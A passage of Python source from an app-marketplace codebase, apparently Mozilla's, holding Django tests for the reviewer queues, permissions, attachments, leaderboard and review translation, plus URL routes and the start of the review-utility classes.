r = rf.get(self.url, {'sort': 'num_abuse_reports',
'order': 'asc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[0], self.apps[1]])
r = rf.get(self.url, {'sort': 'num_abuse_reports',
'order': 'desc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[1], self.apps[0]])
def test_do_sort_version_nom(self):
"""Tests version nomination sort order."""
url = reverse('reviewers.apps.queue_pending')
user = UserProfile.objects.get(username='admin')
version_0 = self.apps[0].versions.get()
version_0.update(nomination=days_ago(1))
version_1 = self.apps[1].versions.get()
version_1.update(nomination=days_ago(2))
# Throw in some disabled versions, they shouldn't affect order.
version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[0],
nomination=days_ago(10))
version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[1],
nomination=days_ago(1))
version_factory({'status': amo.STATUS_DISABLED}, addon=self.apps[1],
nomination=days_ago(20))
req = amo.tests.req_factory_factory(
url, user=user, data={'sort': 'nomination'})
res = queue_apps(req)
doc = pq(res.content)
# Desktop and mobile (hidden on desktop) alternate, so we jump by 2.
eq_(doc('tbody tr')[0].get('data-addon'), str(version_1.addon.id))
eq_(doc('tbody tr')[2].get('data-addon'), str(version_0.addon.id))
req = amo.tests.req_factory_factory(
url, user=user, data={'sort': 'nomination', 'order': 'desc'})
res = queue_apps(req)
doc = pq(res.content)
# Desktop and mobile (hidden on desktop) alternate, so we jump by 2.
eq_(doc('tbody tr')[0].get('data-addon'), str(version_0.addon.id))
eq_(doc('tbody tr')[2].get('data-addon'), str(version_1.addon.id))
def test_do_sort_queue_object(self):
"""Tests sorting queue object."""
rf = RequestFactory()
url = reverse('reviewers.apps.queue_rereview')
earlier_rrq = RereviewQueue.objects.create(addon=self.apps[0])
later_rrq = RereviewQueue.objects.create(addon=self.apps[1])
later_rrq.created += datetime.timedelta(days=1)
later_rrq.save()
request = rf.get(url, {'sort': 'created'})
apps = _do_sort(request, RereviewQueue.objects.all())
# Assert the order that RereviewQueue objects were created is
# maintained.
eq_([earlier_rrq.addon, later_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'created', 'order': 'desc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([later_rrq.addon, earlier_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'name', 'order': 'asc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([later_rrq.addon, earlier_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'name', 'order': 'desc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([earlier_rrq.addon, later_rrq.addon], list(apps))
def test_sort_with_priority_review(self):
"""Tests the sorts are correct with a priority review flagged app."""
# Set up the priority review flagged app.
self.apps.append(app_factory(name='Foxkeh',
status=amo.STATUS_PENDING,
is_packaged=False,
version_kw={'version': '1.0'},
file_kw={'status': amo.STATUS_PENDING},
premium_type=amo.ADDON_FREE,
priority_review=True))
# Set up app attributes.
self.apps[2].update(created=self.days_ago(1))
self.apps[2].addonuser_set.create(
user=UserProfile.objects.create(username='redpanda',
email='[email protected]'))
self.apps[2].addondevicetype_set.create(
device_type=amo.DEVICE_DESKTOP.id)
# And check it also comes out top of waiting time with Webapp model.
rf = RequestFactory()
qs = Webapp.objects.no_cache().all()
# Test apps are sorted by created/asc by default.
r = rf.get(self.url, {'sort': 'invalidsort', 'order': 'dontcare'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[2], self.apps[1], self.apps[0]])
# Test sorting by created, descending.
r = rf.get(self.url, {'sort': 'created', 'order': 'desc'})
sorted_qs = _do_sort(r, qs)
eq_(list(sorted_qs), [self.apps[2], self.apps[0], self.apps[1]])
# And with Version model.
version_0 = self.apps[0].versions.get()
version_0.update(nomination=days_ago(1))
version_1 = self.apps[1].versions.get()
version_1.update(nomination=days_ago(2))
qs = (Version.objects.no_cache().filter(
files__status=amo.STATUS_PENDING, addon__type=amo.ADDON_WEBAPP,
addon__disabled_by_user=False,
addon__status=amo.STATUS_PENDING)
.order_by('nomination', 'created')
.select_related('addon', 'files').no_transforms())
r = rf.get(self.url, {'sort': 'nomination'})
sorted_qs = _do_sort(r, qs, date_sort='nomination')
eq_(list(sorted_qs), [self.apps[2], self.apps[1], self.apps[0]])
r = rf.get(self.url, {'sort': 'nomination', 'order': 'desc'})
sorted_qs = _do_sort(r, qs, date_sort='nomination')
eq_(list(sorted_qs), [self.apps[2], self.apps[0], self.apps[1]])
# And with Rereview model.
url = reverse('reviewers.apps.queue_rereview')
earlier_rrq = RereviewQueue.objects.create(addon=self.apps[0])
earlier_rrq.created += datetime.timedelta(days=1)
earlier_rrq.save()
later_rrq = RereviewQueue.objects.create(addon=self.apps[1])
later_rrq.created += datetime.timedelta(days=2)
later_rrq.save()
pri_rrq = RereviewQueue.objects.create(addon=self.apps[2])
pri_rrq.save()
request = rf.get(url, {'sort': 'created'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([pri_rrq.addon, earlier_rrq.addon, later_rrq.addon], list(apps))
request = rf.get(url, {'sort': 'created', 'order': 'desc'})
apps = _do_sort(request, RereviewQueue.objects.all())
eq_([pri_rrq.addon, later_rrq.addon, earlier_rrq.addon], list(apps))
class TestAppsReviewing(AppReviewerTest, AccessMixin):
def setUp(self):
self.login_as_editor()
super(TestAppsReviewing, self).setUp()
self.url = reverse('reviewers.apps.apps_reviewing')
self.apps = [app_factory(name='Antelope',
status=amo.STATUS_PENDING),
app_factory(name='Bear',
status=amo.STATUS_PENDING),
app_factory(name='Cougar',
status=amo.STATUS_PENDING)]
def _view_app(self, app_id):
self.client.post(reverse('editors.review_viewing'), {
'addon_id': app_id})
def test_no_apps_reviewing(self):
res = self.client.get(self.url)
eq_(len(res.context['apps']), 0)
def test_apps_reviewing(self):
self._view_app(self.apps[0].id)
res = self.client.get(self.url)
eq_(len(res.context['apps']), 1)
def test_multiple_reviewers_no_cross_streams(self):
self._view_app(self.apps[0].id)
self._view_app(self.apps[1].id)
res = self.client.get(self.url)
eq_(len(res.context['apps']), 2)
# Now view an app as another user and verify app.
self.client.login(username='[email protected]', password='password')
self._view_app(self.apps[2].id)
res = self.client.get(self.url)
eq_(len(res.context['apps']), 1)
# Check original user again to make sure app list didn't increment.
self.login_as_editor()
res = self.client.get(self.url)
eq_(len(res.context['apps']), 2)
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachmentDownload(amo.tests.TestCase):
fixtures = ['data/user_editor', 'data/user_editor_group',
'data/group_editor',
'data/user_999'] + fixture('webapp_337141')
def _attachment(self, log):
return ActivityLogAttachment.objects.create(activity_log=log,
filepath='bacon.jpg',
mimetype='image/jpeg')
def _response(self, params={}, **kwargs):
url = self.ala.get_absolute_url()
return self.client.get(url, params, **kwargs)
def setUp(self):
editor = UserProfile.objects.get(pk=5497308)
self.app = Webapp.objects.get(pk=337141)
self.version = self.app.latest_version
self.al = amo.log(amo.LOG.COMMENT_VERSION, self.app,
self.version, user=editor)
self.ala = self._attachment(self.al)
def test_permissions_editor(self):
self.client.login(username='[email protected]', password='password')
response = self._response()
eq_(response.status_code, 200, 'Editor cannot access attachment')
def test_permissions_regular(self):
self.client.login(username='[email protected]', password='password')
response = self._response()
eq_(response.status_code, 403, 'Regular user can access attachment')
def test_headers(self):
self.client.login(username='[email protected]', password='password')
response = self._response()
eq_(response._headers['content-type'][1], 'application/force-download',
'Attachment not served as application/force-download')
eq_(response._headers['content-disposition'][1],
'attachment; filename=bacon.jpg',
'Attachment not served with correct Content-Disposition header')
eq_(response._headers['content-length'][1], '130737',
'Attachment not served with correct Content-Length header')
class TestLeaderboard(AppReviewerTest):
fixtures = ['base/users']
def setUp(self):
self.url = reverse('reviewers.leaderboard')
self.user = UserProfile.objects.get(email='[email protected]')
self.login_as_editor()
amo.set_user(self.user)
def _award_points(self, user, score):
ReviewerScore.objects.create(user=user, note_key=amo.REVIEWED_MANUAL,
score=score, note='Thing.')
def test_leaderboard_ranks(self):
users = (self.user,
UserProfile.objects.get(email='[email protected]'),
UserProfile.objects.get(email='[email protected]'))
self._award_points(users[0], amo.REVIEWED_LEVELS[0]['points'] - 1)
self._award_points(users[1], amo.REVIEWED_LEVELS[0]['points'] + 1)
self._award_points(users[2], amo.REVIEWED_LEVELS[0]['points'] + 2)
def get_cells():
doc = pq(self.client.get(self.url).content.decode('utf-8'))
cells = doc('#leaderboard > tbody > tr > .name, '
'#leaderboard > tbody > tr > .level')
return [cells.eq(i).text() for i in range(0, cells.length)]
eq_(get_cells(),
[users[2].display_name,
users[1].display_name,
amo.REVIEWED_LEVELS[0]['name'],
users[0].display_name])
self._award_points(users[0], 1)
eq_(get_cells(),
[users[2].display_name,
users[1].display_name,
users[0].display_name,
amo.REVIEWED_LEVELS[0]['name']])
self._award_points(users[0], -1)
self._award_points(users[2], (amo.REVIEWED_LEVELS[1]['points'] -
amo.REVIEWED_LEVELS[0]['points']))
eq_(get_cells(),
[users[2].display_name,
amo.REVIEWED_LEVELS[1]['name'],
users[1].display_name,
amo.REVIEWED_LEVELS[0]['name'],
users[0].display_name])
class TestReviewPage(amo.tests.TestCase):
fixtures = fixture('user_editor', 'user_editor_group', 'group_editor')
def setUp(self):
self.create_switch('iarc')
self.app = app_factory(status=amo.STATUS_PENDING)
self.reviewer = UserProfile.objects.get()
self.url = reverse('reviewers.apps.review', args=[self.app.app_slug])
def test_iarc_ratingless_disable_approve_btn(self):
self.app.update(status=amo.STATUS_NULL)
req = req_factory_factory(self.url, user=self.reviewer)
res = app_review(req, app_slug=self.app.app_slug)
doc = pq(res.content)
assert (doc('#review-actions input[value=public]')
.parents('li').hasClass('disabled'))
assert not (doc('#review-actions input[value=reject]')
.parents('li').hasClass('disabled'))
def test_iarc_content_ratings(self):
for body in [mkt.ratingsbodies.CLASSIND.id, mkt.ratingsbodies.USK.id]:
self.app.content_ratings.create(ratings_body=body, rating=0)
req = req_factory_factory(self.url, user=self.reviewer)
res = app_review(req, app_slug=self.app.app_slug)
doc = pq(res.content)
eq_(doc('.reviewers-desktop .content-rating').length, 2)
eq_(doc('.reviewers-mobile .content-rating').length, 2)
class TestReviewTranslate(AppReviewerTest):
def setUp(self):
self.login_as_editor()
self.create_switch('reviews-translate')
user = UserProfile.objects.create(username='diego')
app = amo.tests.app_factory(slug='myapp')
self.review = app.reviews.create(title=u'yes', body=u'oui',
addon=app, user=user,
editorreview=True, rating=4)
def test_regular_call(self):
res = self.client.get(reverse('reviewers.review_translate',
args=[self.review.addon.slug,
self.review.id, 'fr']))
self.assert3xx(res, 'https://translate.google.com/#auto/fr/oui', 302)
@mock.patch('mkt.reviewers.views.requests')
def test_ajax_call(self, requests):
# Mock requests.
response = mock.Mock(status_code=200)
response.json.return_value = {
u'data': {
u'translations': [{
u'translatedText': u'oui',
u'detectedSourceLanguage': u'fr'
}]
}
}
requests.get.return_value = response
# Call translation.
review = self.review
res = self.client.get_ajax(reverse('reviewers.review_translate',
args=[review.addon.slug, review.id,
'fr']),)
eq_(res.status_code, 200)
eq_(res.content, '{"body": "oui", "title": "oui"}')
@mock.patch('mkt.reviewers.views.requests')
def test_invalid_api_key(self, requests):
# Mock requests.
response = mock.Mock(status_code=400)
response.json.return_value = {
'error': {
'code': 400,
'errors': [
{'domain': 'usageLimits',
'message': 'Bad Request',
'reason': 'keyInvalid'}
],
'message': 'Bad Request'
}
}
requests.get.return_value = response
# Call translation.
review = self.review
res = self.client.get_ajax(reverse('reviewers.review_translate',
args=[review.addon.slug, review.id,
'fr']),)
eq_(res.status_code, 400)
########NEW FILE########
__FILENAME__ = test_views_api
import json
from datetime import datetime
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from cache_nuggets.lib import Token
from nose.tools import eq_
from test_utils import RequestFactory
import amo
import mkt.regions
from access.models import GroupUser
from addons.models import Category
from amo.tests import ESTestCase
from tags.models import Tag
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuthClient, RestOAuth
from mkt.api.models import Access, generate
from mkt.constants.features import FeatureProfile
from mkt.reviewers.utils import AppsReviewing
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class TestReviewing(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestReviewing, self).setUp()
self.list_url = reverse('reviewing-list')
self.user = UserProfile.objects.get(pk=2519)
self.req = RequestFactory().get('/')
self.req.amo_user = self.user
def test_verbs(self):
self._allowed_verbs(self.list_url, ('get'))
def test_not_allowed(self):
eq_(self.anon.get(self.list_url).status_code, 403)
def test_still_not_allowed(self):
eq_(self.client.get(self.list_url).status_code, 403)
def add_perms(self):
self.grant_permission(self.user, 'Apps:Review')
def test_allowed(self):
self.add_perms()
res = self.client.get(self.list_url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
eq_(data['objects'], [])
def test_some(self):
self.add_perms()
# This feels rather brittle.
cache.set('%s:review_viewing:%s' % (settings.CACHE_PREFIX, 337141),
2519, 50 * 2)
AppsReviewing(self.req).add(337141)
res = self.client.get(self.list_url)
data = json.loads(res.content)
eq_(data['objects'][0]['resource_uri'],
reverse('app-detail', kwargs={'pk': 337141}))
class TestApiReviewer(RestOAuth, ESTestCase):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestApiReviewer, self).setUp()
self.user = UserProfile.objects.get(pk=2519)
self.profile = self.user
self.profile.update(read_dev_agreement=datetime.now())
self.grant_permission(self.profile, 'Apps:Review')
self.access = Access.objects.create(
key='test_oauth_key', secret=generate(), user=self.user)
self.url = reverse('reviewers-search-api')
self.webapp = Webapp.objects.get(pk=337141)
self.category = Category.objects.create(name='test',
type=amo.ADDON_WEBAPP)
self.webapp.update(status=amo.STATUS_PENDING)
self.refresh('webapp')
def test_fields(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
obj = res.json['objects'][0]
self.assertSetEqual(obj.keys(), ['device_types', 'id', 'is_escalated',
'is_packaged', 'latest_version', 'name', 'premium_type', 'price',
'slug', 'status'])
eq_(obj['latest_version']['status'], 4)
def test_anonymous_access(self):
res = self.anon.get(self.url)
eq_(res.status_code, 403)
def test_non_reviewer_access(self):
GroupUser.objects.filter(group__rules='Apps:Review',
user=self.profile).delete()
res = self.client.get(self.url)
eq_(res.status_code, 403)
def test_owner_still_non_reviewer_access(self):
user = Webapp.objects.get(pk=337141).authors.all()[0]
access = Access.objects.create(
key='test_oauth_key_owner', secret=generate(), user=user)
client = RestOAuthClient(access)
res = client.get(self.url)
eq_(res.status_code, 403)
def test_status(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'status': 'pending'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'status': 'rejected'})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
self.webapp.update(status=amo.STATUS_REJECTED)
self.refresh('webapp')
res = self.client.get(self.url, {'status': 'rejected'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
self.webapp.update(status=amo.STATUS_PUBLIC)
self.refresh('webapp')
res = self.client.get(self.url, {'status': 'public'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'status': 'any'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'status': 'vindaloo'})
eq_(res.status_code, 400)
error = res.json['detail']
eq_(error.keys(), ['status'])
def test_is_escalated(self):
res = self.client.get(self.url, {'is_escalated': True})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
res = self.client.get(self.url, {'is_escalated': False})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'is_escalated': None})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_is_tarako(self):
Tag(tag_text='tarako').save_tag(self.webapp)
self.webapp.save()
self.refresh()
res = self.client.get(self.url, {'is_tarako': True})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'is_tarako': False})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
res = self.client.get(self.url, {'is_tarako': None})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_has_editors_comment(self):
res = self.client.get(self.url, {'has_editor_comment': True})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
res = self.client.get(self.url, {'has_editor_comment': False})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'has_editor_comment': None})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_has_info_request(self):
res = self.client.get(self.url, {'has_info_request': True})
eq_(res.status_code, 200)
objs = res.json['objects']
eq_(len(objs), 0)
res = self.client.get(self.url, {'has_info_request': False})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'has_info_request': None})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_addon_type(self):
res = self.client.get(self.url, {'type': 'app'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
res = self.client.get(self.url, {'type': 'vindaloo'})
eq_(res.status_code, 400)
error = res.json['detail']
eq_(error.keys(), ['type'])
def test_no_region_filtering(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, {'region': 'br'})
eq_(res.status_code, 200)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_no_feature_profile_filtering(self):
feature_profile = FeatureProfile().to_signature()
qs = {'q': 'something', 'pro': feature_profile, 'dev': 'firefoxos'}
# Enable an app feature that doesn't match one in our profile.
self.webapp.current_version.features.update(has_pay=True)
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, qs)
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
obj = res.json['objects'][0]
eq_(obj['slug'], self.webapp.app_slug)
def test_no_flash_filtering(self):
f = self.webapp.get_latest_file()
f.uses_flash = True
f.save()
self.webapp.save()
self.refresh('webapp')
res = self.client.get(self.url, {'dev': 'firefoxos'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
def test_no_premium_filtering(self):
self.webapp.update(premium_type=amo.ADDON_PREMIUM)
self.refresh('webapp')
res = self.client.get(self.url, {'dev': 'android'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
class TestApproveRegion(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def url(self, **kwargs):
kw = {'pk': '337141', 'region': 'cn'}
kw.update(kwargs)
return reverse('approve-region', kwargs=kw)
def test_verbs(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
self._allowed_verbs(self.url(), ['post'])
def test_anon(self):
res = self.anon.post(self.url())
eq_(res.status_code, 403)
def test_bad_webapp(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
res = self.client.post(self.url(pk='999'))
eq_(res.status_code, 404)
def test_webapp_not_pending_in_region(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
res = self.client.post(self.url())
eq_(res.status_code, 404)
def test_good_but_no_permission(self):
res = self.client.post(self.url())
eq_(res.status_code, 403)
def test_good_webapp_but_wrong_region_permission(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionBR')
app = Webapp.objects.get(id=337141)
app.geodata.set_status('cn', amo.STATUS_PENDING, save=True)
res = self.client.post(self.url())
eq_(res.status_code, 403)
def test_good_webapp_but_wrong_region_queue(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
app = Webapp.objects.get(id=337141)
app.geodata.set_status('cn', amo.STATUS_PENDING, save=True)
res = self.client.post(self.url(region='br'))
eq_(res.status_code, 403)
def test_good_rejected(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
app = Webapp.objects.get(id=337141)
app.geodata.set_status('cn', amo.STATUS_PENDING, save=True)
res = self.client.post(self.url())
eq_(res.status_code, 200)
obj = json.loads(res.content)
eq_(obj['approved'], False)
eq_(app.geodata.reload().get_status('cn'), amo.STATUS_REJECTED)
def test_good_approved(self):
self.grant_permission(self.profile, 'Apps:ReviewRegionCN')
app = Webapp.objects.get(id=337141)
app.geodata.set_status('cn', amo.STATUS_PENDING, save=True)
res = self.client.post(self.url(), data=json.dumps({'approve': '1'}))
eq_(res.status_code, 200)
obj = json.loads(res.content)
eq_(obj['approved'], True)
eq_(app.geodata.reload().get_status('cn'), amo.STATUS_PUBLIC)
class TestGenerateToken(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestGenerateToken, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.url = reverse('generate-reviewer-token', args=[self.app.app_slug])
self.user = UserProfile.objects.get(pk=2519)
self.req = RequestFactory().get('/')
self.req.amo_user = self.user
def test_verbs(self):
self._allowed_verbs(self.url, ('post'))
def test_not_allowed(self):
eq_(self.anon.post(self.url).status_code, 403)
def test_still_not_allowed(self):
eq_(self.client.post(self.url).status_code, 403)
def test_token(self):
self.grant_permission(self.user, 'Apps:Review')
res = self.client.post(self.url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
assert 'token' in data
# Check data in token.
assert Token.valid(data['token'], data={'app_id': self.app.id})
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
import amo
from apps.editors.views import queue_viewing, review_viewing
from mkt.receipts.urls import receipt_patterns
from mkt.reviewers import views
# All URLs under /reviewers/.
url_patterns = patterns('',
url(r'^apps/$', views.home, name='reviewers.home'),
url(r'^$', views.route_reviewer, name='reviewers'),
url(r'^apps/queue/$', views.queue_apps,
name='reviewers.apps.queue_pending'),
url(r'^apps/queue/region/(?P<region>[^ /]+)?$', views.queue_region,
name='reviewers.apps.queue_region'),
url(r'^apps/queue/rereview/$', views.queue_rereview,
name='reviewers.apps.queue_rereview'),
url(r'^apps/queue/updates/$', views.queue_updates,
name='reviewers.apps.queue_updates'),
url(r'^apps/queue/escalated/$', views.queue_escalated,
name='reviewers.apps.queue_escalated'),
url(r'^apps/queue/moderated/$', views.queue_moderated,
name='reviewers.apps.queue_moderated'),
url(r'^apps/queue/device/$', views.queue_device,
name='reviewers.apps.queue_device'),
url(r'^apps/review/%s$' % amo.APP_SLUG, views.app_review,
name='reviewers.apps.review'),
url(r'^apps/review/%s/manifest$' % amo.APP_SLUG, views.app_view_manifest,
name='reviewers.apps.review.manifest'),
url(r'^apps/review/attachment/(\d+)$', views.attachment,
name='reviewers.apps.review.attachment'),
url(r'^apps/review/%s/abuse$' % amo.APP_SLUG, views.app_abuse,
name='reviewers.apps.review.abuse'),
url(r'^apps/logs$', views.logs, name='reviewers.apps.logs'),
url(r'^apps/motd$', views.motd, name='reviewers.apps.motd'),
url(r'^queue_viewing$', queue_viewing, name='editors.queue_viewing'),
url(r'^review_viewing$', review_viewing, name='editors.review_viewing'),
url(r'^apps/reviewing$', views.apps_reviewing,
name='reviewers.apps.apps_reviewing'),
url(r'^receipt/', include(receipt_patterns)),
url(r'^%s/(?P<version_id>\d+)/mini-manifest$' % amo.APP_SLUG,
views.mini_manifest, name='reviewers.mini_manifest'),
url(r'^signed/%s/(?P<version_id>\d+)$' % amo.APP_SLUG,
views.get_signed_packaged, name='reviewers.signed'),
url(r'''^performance/(?P<username>[^/<>"']+)?$''', views.performance,
name='reviewers.performance'),
url(r'^leaderboard/$', views.leaderboard, name='reviewers.leaderboard'),
)
api_patterns = patterns('',
url('^reviewers/search', views.ReviewersSearchView.as_view(),
name='reviewers-search-api'),
url(r'^reviewers/app/(?P<pk>[^/<>"\']+)/approve/(?P<region>[^ /]+)?$',
views.ApproveRegion.as_view(), name='approve-region'),
url(r'^reviewers/reviewing', views.ReviewingView.as_view(),
name='reviewing-list'),
url('^reviewers/(?P<addon_slug>[\w-]+)/review/(?P<review_pk>\d+)/translate'
'/(?P<language>[a-z]{2}(-[A-Z]{2})?)$',
views.review_translate,
name='reviewers.review_translate'),
url(r'^reviewers/app/(?P<pk>[^/<>"\']+)/token$',
views.GenerateToken.as_view(), name='generate-reviewer-token'),
)
########NEW FILE########
__FILENAME__ = utils
import json
import urllib
from datetime import datetime
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.utils import translation
from django.utils.datastructures import SortedDict
import commonware.log
import waffle
from tower import ugettext_lazy as _lazy
import amo
from access import acl
from amo.helpers import absolutify
from amo.utils import JSONEncoder, send_mail_jinja, to_language
from editors.models import EscalationQueue, RereviewQueue, ReviewerScore
from files.models import File
from mkt.comm.utils import create_comm_note
from mkt.constants import comm
from mkt.constants.features import FeatureProfile
from mkt.site.helpers import product_as_dict
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.mailer')
def send_mail(subject, template, context, emails, perm_setting=None, cc=None,
attachments=None, reply_to=None):
if not reply_to:
reply_to = settings.MKT_REVIEWERS_EMAIL
# Link to our newfangled "Account Settings" page.
manage_url = absolutify('/settings') + '#notifications'
send_mail_jinja(subject, template, context, recipient_list=emails,
from_email=settings.MKT_REVIEWERS_EMAIL,
use_blacklist=False, perm_setting=perm_setting,
manage_url=manage_url, headers={'Reply-To': reply_to},
cc=cc, attachments=attachments)
class ReviewBase(object):
def __init__(self, request, addon, version, review_type,
attachment_formset=None):
self.request = request
self.user = self.request.user
self.addon = addon
self.version = version
self.review_type = review_type
self.files = None
self.comm_thread = None
self.attachment_formset = attachment_formset
self.in_pending = self.addon.status == amo.STATUS_PENDING
self.in_rereview = RereviewQueue.objects.filter(
addon=self.addon).exists()
self.in_escalate = EscalationQueue.objects.filter(
addon=self.addon).exists()
def get_attachments(self):
"""
Returns a list of triples suitable to be attached to an email.
"""
try:
num = int(self.attachment_formset.data['attachment-TOTAL_FORMS'])
except (ValueError, TypeError):
return []
else:
files = []
for i in xrange(num):
attachment_name = 'attachment-%d-attachment' % i
attachment = self.request.FILES.get(attachment_name)
if attachment:
attachment.open()
files.append((attachment.name, attachment.read(),
attachment.content_type))
return files
def set_addon(self, **kw):
"""Alters addon using provided kwargs."""
self.addon.update(_signal=False, **kw)
def set_reviewed(self):
"""Sets reviewed timestamp on version."""
self.version.update(_signal=False, reviewed=datetime.now())
def set_files(self, status, files, hide_disabled_file=False):
"""Change the files to be the new status and hide as appropriate."""
for file in files:
file.update(_signal=False, datestatuschanged=datetime.now(),
reviewed=datetime.now(), status=status)
if hide_disabled_file:
file.hide_disabled_file()
def create_note(self, action):
"""
Permissions default to developers + reviewers + Mozilla contacts.
For escalation/comment, exclude the developer from the conversation.
"""
details = {'comments': self.data['comments'],
'reviewtype': self.review_type}
if self.files:
details['files'] = [f.id for f in self.files]
# Commbadge (the future).
perm_overrides = {
comm.ESCALATION: {'developer': False},
comm.REVIEWER_COMMENT: {'developer': False},
}
note_type = comm.ACTION_MAP(action.id)
self.comm_thread, self.comm_note = create_comm_note(
self.addon, self.version, self.request.amo_user,
self.data['comments'], note_type=note_type,
# Ignore switch so we don't have to re-migrate new notes.
perms=perm_overrides.get(note_type), no_switch=True,
attachments=self.attachment_formset)
# ActivityLog (ye olde).
amo.log(action, self.addon, self.version, user=self.user,
created=datetime.now(), details=details,
attachments=self.attachment_formset)
def notify_email(self, template, subject, fresh_thread=False):
"""Notify the authors that their app has been reviewed."""
if waffle.switch_is_active('comm-dashboard'):
# Communication dashboard uses send_mail_comm.
return
data = self.data.copy()
data.update(self.get_context_data())
data['tested'] = ''
dt, br = data.get('device_types'), data.get('browsers')
if dt and br:
data['tested'] = 'Tested on %s with %s' % (dt, br)
elif dt and not br:
data['tested'] = 'Tested on %s' % dt
elif not dt and br:
data['tested'] = 'Tested with %s' % br
emails = list(self.addon.authors.values_list('email', flat=True))
cc_email = self.addon.get_mozilla_contacts()
log.info(u'Sending email for %s' % self.addon)
send_mail(subject % data['name'],
'reviewers/emails/decisions/%s.txt' % template, data,
emails, perm_setting='app_reviewed', cc=cc_email,
attachments=self.get_attachments())
def get_context_data(self):
# We need to display the name in some language that is relevant to the
# recipient(s) instead of using the reviewer's. addon.default_locale
# should work.
if self.addon.name.locale != self.addon.default_locale:
lang = to_language(self.addon.default_locale)
with translation.override(lang):
app = Webapp.objects.get(id=self.addon.id)
else:
app = self.addon
return {'name': app.name,
'reviewer': self.request.user.name,
'detail_url': absolutify(
app.get_url_path(add_prefix=False)),
'review_url': absolutify(reverse('reviewers.apps.review',
args=[app.app_slug],
add_prefix=False)),
'status_url': absolutify(app.get_dev_url('versions')),
'comments': self.data['comments'],
'MKT_SUPPORT_EMAIL': settings.MKT_SUPPORT_EMAIL,
'SITE_URL': settings.SITE_URL}
def request_information(self):
"""Send a request for information to the authors."""
emails = list(self.addon.authors.values_list('email', flat=True))
self.create_note(amo.LOG.REQUEST_INFORMATION)
self.version.update(has_info_request=True)
log.info(u'Sending request for information for %s to %s' %
(self.addon, emails))
# Create thread.
self.notify_email('info', u'More information needed to review: %s')
class ReviewApp(ReviewBase):
def set_data(self, data):
self.data = data
self.files = self.version.files.all()
def process_public(self):
"""
Makes an app public or public waiting.
Changes status to Public/Public Waiting.
Creates Approval note/email.
"""
if self.addon.has_incomplete_status():
